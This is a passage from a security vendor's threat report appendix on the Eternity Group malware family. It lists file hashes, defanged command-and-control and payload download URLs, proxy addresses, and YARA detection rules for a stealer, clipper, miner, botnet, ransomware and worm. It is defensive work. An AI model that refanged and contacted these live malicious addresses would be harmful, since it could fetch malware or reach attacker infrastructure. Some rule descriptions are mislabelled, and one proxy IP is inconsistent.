                                                                                                                       43
A DEEP DIVE INTO ETERNITY GROUP

CYBERSECURITY ANNUAL REPORT
   Appendix

   Indicators of Compromise

   Jester Stealer:
    C2s:
      •    hxxp://jesterdcuxzbey4xvlwwheoecpltru5be2mzuk4w7a7nrhckdjjhrbyd.]onion/report/BlackFish

    Hashes:
      •    0672b11bc92a91d742919f79b38161acf7732997d8f27693488e14118d7ea420
      •    0f5d3a6ccd5cfb4ff00c9efd12b1b6b0658620947897638932fbb4f1a69ac204
      •    11246136ce79c7969d92227c15e9300849823151cfb10908ed4662f0306ece07
      •    11ded0a7d6d202119faf22fa3f22c5012813f3c1ba0ded04f4dafb705623389e
      •    1306e24bda80da1dacddc7c7d808502407cc8b29960d807aed0327050ba32be6
      •    174f347b357e36331acbde34379318c1f2cd3f3f7693da1a6a3c820e3b6f73c2
      •    1828e8a313c5cb0c4871a0bebec169ef7d665dd4d6ff08de63434920facc29e6
      •    22bad9fcb954fcb8cd9928eeb05d042618d1b154ca7ec7e0245514d131342366
      •    2e8d37a9b1125fa6fa3be4b89bc4c17f51130205237c12e87f16e586a6624fba
      •    3168f18432106cfaf21f48598c1b26b1026de7a0bac69ae548c79dec67be7853
      •    31c6ddb0cca22fb7bed694ba8956af3f942abb2bbc2d38e7cbdd265204ef218b
      •    358027cd37d73f2fac5765787a6a43c45682001b325cb1b235c4c2293cf20541
      •    3b8adbf81f190ab87e27aca03cc50af0766a589777b6f595451885662c37b033
      •    3d012f3b18bfd758729295f47509827ff61fdc13ced823411ca0216b796e94f0
      •    43f3ff6b08f1c47241ca83ebfa1104d6297638b09d4884d83e8c7fceeff070d3
      •    4417195f416e6bd019c0982978bf1f00c0c848e5ac2e020f278629bbe21266b6
      •    46438ce67833837a1f48ce2e16850ebf81936bbb069a00ce9751302e831604b2
      •    549df00f77e2782a316da85ce2de6339a6060605b9da25af61d588d3d9669c4d
      •    567024d5cca61e3b7bb987c3f36367b9c6981d8dd029c1fd7aa679d8f72929b5
      •    5a8dd9184f6781d4731846a4631a7dd8e38c99d312caa209e83ccfc1e5250a3c
      •    610ea66627a1e7af2ba5b0a5b5aa12c6898347ace730bfb326a083ee5b40f3fb
      •    697089eaf22c630995580ca8c32f2daca0db9f0c44180f447bd12b9bf34c0737
      •    6b5d08ce5d46ebfaf12bd966f34bb4096cce0f13fd8bf9048621e1c0582da120
      •    6c87c1ce8fabf36fb876553e9b6525dedb9563179dd4e6267870b39adf47a0a1
      •    6f3175eaa15bd9e6f0a27880f9d63e5d1ed6f4d2255b173832cb6a152b563cba
      •    6f7f22d44491f9768519ae4aafc93a543d37186a9ccd1e197e29014a48c13095
      •    75ac96db15096428b6c9d42060f08a6ade84a7c36cf546e726fe09fbe5963f3f
      •    80d5b305a9bd22b44c3545f2d5609217c4f86ec3b4723e0a05d0219040ced9a5
      •    85fc1c3402f46fb32f8b912233284d3b52e127a5e96c58d2ca80ffa741e2db53
      •    873d3b237380874dce724286fd5b0a0e1ebdcc80e9985d3b6e26a397fe376f35
      •    8946892a1354aebdd14040128348bd3905c35b40c713e0cf9bdc7426ae24fe69
      •    96341ed4164c08afaeb688e715bdbf621afbe0f6129151219d41dde123170480
      •    9e9e61bff2a2e6b22f4389f77e980ed0ba95153706225166419def6b1eeac403
      •    a679ee3c33f24010f2b794bb76e0f4b11bbca6c4f87240820e308ea1d5b442cf
      •    ad730fa7559d8fcd02efab6afe2c8a4e9d766d318074842582457b79ba299532

                                                                                                     44
A DEEP DIVE INTO ETERNITY GROUP

CYBERSECURITY
     •              ANNUAL REPORT
       b03ecda181e843116c4c19520be8b57cd5c9916c1590ef9d585031b7ea0d6d78
         •    b1a4fb5177d642fb5647168070aa054f2eace2291c82361f0799ba0fbac38483
         •    b371d7d7799bdd78b61ec1ff7ec1dbd74182f7389e182536beb8a4d0659e7d36
         •    b437dc0d347e336dd3ca7c9af3ee982e3c7f9703bd2ba7d217400055c5234833
         •    b61663582da089a5ba37ad833149864a99ce60d8f2d9106d02aa26baa7b14106
         •    c3f01206a620eba330732ea77b7ded5cde172ccd29cbc183fb139a7c853fcc65
         •    c76e9aea199e40e589741f6b470fe8f3b0758c78aae39adf20d8b86aa2e8904f
         •    ceb1a94e9366a84f75948fbe56576945abeb7b2ecb578b00aeaa22b7896bf6fb
         •    d42bb466c7b301a33bb3cbe43b0194982b3b245eaeb1f3e69fea3996fd09c4e4
         •    e44a8f63f2f0874d77bddbce5ede7a8bf41733658002d2549f1610f7938aeb3d
         •    e9614dda4527fe9ab01d5340cfc0971834b5a663e51ba5cbe5c1a89348677e33
         •    ec2f1ea5abb622415977edbc08a7f3f3fde4c5cf6441d462a9adef5910081443
         •    ee5e8737168f71747990cce9802470c6d9d484ebd51225fd972408f4909c92fc
         •    f02ef98085a3fdd98fddef6645f2708642d91365e020464cf888d6c8a01d12ce
         •    f493fe1ced3f6c2c1681670e3df792d0d38b2e2592dbfb43aafa71e8b21044bf
         •    ff20545409561a3e276fabe901e405061f0c258db0da1dda6d82863a47b8fc10
         •    ffe4f973a58fac2a65083c1878f56369edbf375935c9221ca91adb21e3111627
         •    02ae8936bcaa3c276741a0b22257ef6321621611ee0a40ca9b8ebecee44a6430
         •    138fc1f7c4374e9c8c23ac46e883ddffeee447159a48ca9c2eedc9ba6bf90966
         •    1e80d8a31d094f2f908f67c6a80d30b62c63f27c960658fdcbdd3012eeb77dca
         •    1f4d2b9cb054d0dd1a721df83c275689bc21615a83f61e0a4ae1a0313c7d4cc1
         •    23de41c113cd6af59a7c6721fd37755b0b4066a8f58dcf3e43f8dc10c0a65ce2
         •    2483d4773d591813323680ad995807d9092b4b8c423f359f2976a24dcd8c7ae7
         •    2f51ca73e34d0dd5ca240bdb614186a59ebe80b28bbf183b7354465321b5e9d0
         •    2f60f276804b85bc8ee3cc63be9c1d5b303c4c722a678c59e768642b31d35bb3
         •    48e2a946a501787936ea194cc029e29bcd6049d4a954b616f91bccf7188b3b0e
         •    5c18b4259612602d17098bd40db9545c5d91acb22409fec4023f35bfa1d23936
         •    5e248950e37b653abd4c353113b932d71143d3431a47a728c1d6d135d4825735
         •    6540a1564cb42b0036bc4bc7a91116009963d39ff7f271c31821cd08eb0e27e9
         •    654576c4e6f9489f5264755401ad59fadaa60e539bf6e6b9b8636824eaea3539
         •    66450506a281a73603b0f892865512db95be1df8b54b53dfb11a0b7a3df8ea8c
         •    69f39e040a92a6f4da19b5bb852d49d321c7ee2ebaefd7c4b8ecac483fdfeb9c
         •    6dd7f4652faa45c4e124cdeb6582262b8572f5ed8bd7fbdb2967ee5dce01d8e0
         •    776b177e66ccdf87836b3448371596d23815cf69124eaf6be1f37c8be6c998e3
         •    81f1cb3a702f99312f8dd7a881e144a928d26f6cf5306113d58bc44b8faa48e2
         •    83315459c10621aa4965545a36ec5fb0b803ec0dcd5a1fa3b3a2266db9165714
         •    90c45c20b5a6c279916b4cab9a1abecc662e1fa547fe700aa415d9f685654ba6
         •    a3b39307457b22600a4d4da61576587847923b2033cbad24172f1e8fdfa0bde6
         •    a4a81d6a903411ebca75c1f2d85f6db8ef65cd6e4e5fdbaa9b8fafc093d42970
         •    bbe1d5273dc432c3aec2996d5295c96051baa3848a312c9de17b4068b9aeaa0b
         •    bfecd381f1a7dac0e4231e7a529b8ed801bf8a21cc07870615d8d39fdc545e5a
         •    c4749988fba26fc4f3b969c4c02527470221935ccc49698634670662c8f56169
         •    cc73c4d55960eaf88c5ff7be748c3d64f9074406929ff4c29deb936492b32747
         •    dd3fd7cf7acda8a299b8b86c9600efe97255217c37ad423cf07f3186462b9199
         •    Eeb1a32b9f53fabf7281219e38f5901b98905b1a68d633841946f190aa6d1c7d

     Proxy:
         •    6.173.214.]33:19797

                                                                                 45
A DEEP DIVE INTO ETERNITY GROUP

CYBERSECURITY    ANNUAL REPORT
   Merlynn Clipper:
      •    543cdfe5900ea81ff76fcc07999ea13ce7636939d010d6070a4db3215e946012
      •    dc8765321c2a0b3ce6fb26c284e8a98f831cf2a21cc49b24f017de396ef925d9
      •    F948fc3a5970cc6bc0b8b767ec89864daa2542eb09b32a9c952070c8d9ec3e99

   Trinity Miner:
      •    4ec2be2e2e2bc0dfdc9b8c741fbfab0432f045716d27c3b27ac16fad4cb47dab
      •    548c77e96af227a149b1526878eb071ca4d937f974681855dfac7169612706d0

   Lilith Botnet:
    C2s:
      •    hxxp://31.44.5.14:4545/gate/{0}/{1}

    Hashes:
      •    006bb86b29f11cd6a517db136478b940f8a7966acff4251188c5b82207beadae
      •    06e8f574a284848160eda6f5b8384d3023d98fdf727db44cfa07fd22139ab5f5
      •    150d348ba6d84cd7095f78719e83c7a8ab1445f0d68ae5886f4e731b5aa5882e
      •    2e431d97623926bdb5a3e7bab1210a9d2b1f976beab7f5a75cc21505c78e7f5b
      •    6152ebdf85ea6fccd2039e3f9a12c8a5e631db05f8d4909ebbaf529e1778f6fd
      •    7471e203f640455c86843a8bbff52aaffb805ae927c5fbd0718bc96edb2e7dce
      •    770b1a5a8bf93029993f72095e85837655ed692a8e0f7a5ec48b9ede27b18b7b
      •    7a8a056be6c025bf1399b5e5f7a3d69e6b3d8eed8b12745578ef62d2b6929b74
      •    7af1ff3415c1cde09a6653950ae0483e9be1b86a5dde85823e30cea2bf07b9ba
      •    829c7a8dda3b4c7585348038466c71633acb821d05c1c978f633cdb0175fdec7
      •    8dbfbe48755ecf0c0cba6161cd321025a1dd86cb389f8963a218783cbb99a85f
      •    8dde1786f60b0c1d52c5e7c28493bfde4159ede361225d23147d04fa8bb955d7
      •    8e595952e5b2e50dd992fdfbc868c8e5afdc288b097e6b890c0a43604c9a5813
      •    94d02ee9613654832894f09d6325d53b4457dd436bb9dd7c32cee0df274c16d
      •    dfd448e14200d2d0143c9c9afaa69deb44725f127d5f38c7bdddce1bf71d3524
      •    e82d16bc77bdfb25fb2e316bb65e9e565ec07aad7bd8441ea09c4abfda04806d
      •    ed5a02370568674fdf12bae74a035daf1c6fabba84d1a3a0f7baf257ad3a6259
      •    Fe498281daf27f0c6a5db9859192e2e8371f03f36a92d83e3f691677426dde18

   Eternity Ransomware:
      •    3ba098b717d6f9c52cc0ca4408dbde8e29886eb9103d1724b0d6930b431035c5

   Eternity Worm:
    Hashes:
      •    757eb1dc48fc181b770984905c3ec14c7be9c8f9bdf813108417e318479051f5
      •    77865f1b05c1f30363d9ba72a676894b3f4bd30641e0f3e50de2b68a8f10f6fe

    Payloads:
      •    hxxp://c.vinhall169.]com/w.exe
      •    hxxp://iqox575zftwvbkphhnbdxkg6pfrgcmeos3rebjwdt6ra2r73u5iq2jqd.]onion/shared/worm.exe
      •    hxxp://c.tronlink.]golf/sa/c.exe
      •    hxxp://c.tronlink.]golf/sa/w.exe

    Proxy:
       •   46.173.214.]33:19797
                                                                                                    46
A DEEP DIVE INTO ETERNITY GROUP

CYBERSECURITY
   Yara Rules ANNUAL REPORT
   rule jester_stealer_lilith_botnet
   {
     meta:
         description = "Rule for Jester Stealer"
      author = "Yoroi Malware ZLab"
         last_updated = "2022-05-02"
         tlp = "WHITE"
         category = "informational"
     strings:
      $stealer_botnet = {000511????12????0E0812????12????}
      $BSJB = {42534A42}
         $GUID = {2347554944}
     condition:
      all of them and uint16(0) == 0x5A4D
   }

   rule merlynn_clipper
   {
     meta:
      description = "Rule for Merlynn Clipper"
      author = "Yoroi Malware ZLab"
         last_updated = "2022-05-02"
         tlp = "WHITE"
         category = "informational"
     strings:
      $clipper_bytecode = {0203280900000628220000062A}
         $clipper2_bytecode = {0D001203284500000A066F4600000A6F4700000A1304}
      $BSJB = {42534A42}
         $GUID = {2347554944}
     condition:
      3 of them and uint16(0) == 0x5A4D
   }

   rule trinity_miner
   {
     meta:
      description = "Rule for Trinity Miner"
      author = "Yoroi Malware ZLab"
         last_updated = "2022-05-02"
         tlp = "WHITE"
         category = "informational"
     strings:
      $miner_bytecode = {14110A7E1000000A7E1000000A171A7E1000000A110B11071108280700000626}
      $BSJB = {42534A42}
       $GUID = {2347554944}
     condition:
      all of them and uint16(0) == 0x5A4D
   }

   rule eternity_worm{

                                                                                             47
A DEEP DIVE INTO ETERNITY GROUP

CYBERSECURITY
    meta:     ANNUAL REPORT
      description = "Rule for Trinity Miner"
      author = "Yoroi Malware ZLab"
      last_updated = "2022-05-02"
      tlp = "WHITE"
      category = "informational"
   strings:
         $1 = {03286E0200060A}
         $2 = {0628620200060B}
         $3 =
   {FE0C0000FE0C0100FE0C0000FE0C010093284100000A3A13000000FE0C0000FE0C010093284200000A380E000
   000FE0C0000FE0C010093284300000A9D}
         $4 = {FE1C4D00000158}
         $BSJB = {42534A42}
         $GUID = {2347554944}
   condition:
       3of them and uint16(0) == 0x5A4D
   }

   rule eternity_ransomware
   {
   meta:
      description = "Rule for Trinity Miner"
      author = "Yoroi Malware ZLab"
      last_updated = "2022-05-02"
      tlp = "WHITE"
      category = "informational"
    strings:
      $bytecode = {022810010006066F5B01000628550100060B}
      $BSJB = {42534A42}
      $GUID = {2347554944}
    condition:
       all of them and uint16(0) == 0x5A4D
   }

                                                                                                48
A DEEP DIVE INTO ETERNITY GROUP

CYBERSECURITY ANNUAL REPORT

                                                    Yoroi S.r.l.
                                    www.yoroi.company - info@yoroi.company

                                                Piazza Sallustio, 9
                                               00187 – Roma (RM)
                                               +39 (051) 0301005

                                Yoroi S.r.l. ® 2014-2021 – Tutti i diritti riservati

      Yoroi S.r.l. società soggetta ad attività di direzione e coordinamento esercitata dalla Tinexta S.p.A.

          Yoroi ® è un marchio registrato                                  Registrazione N°: 016792947

                                                                                                               49
You can also read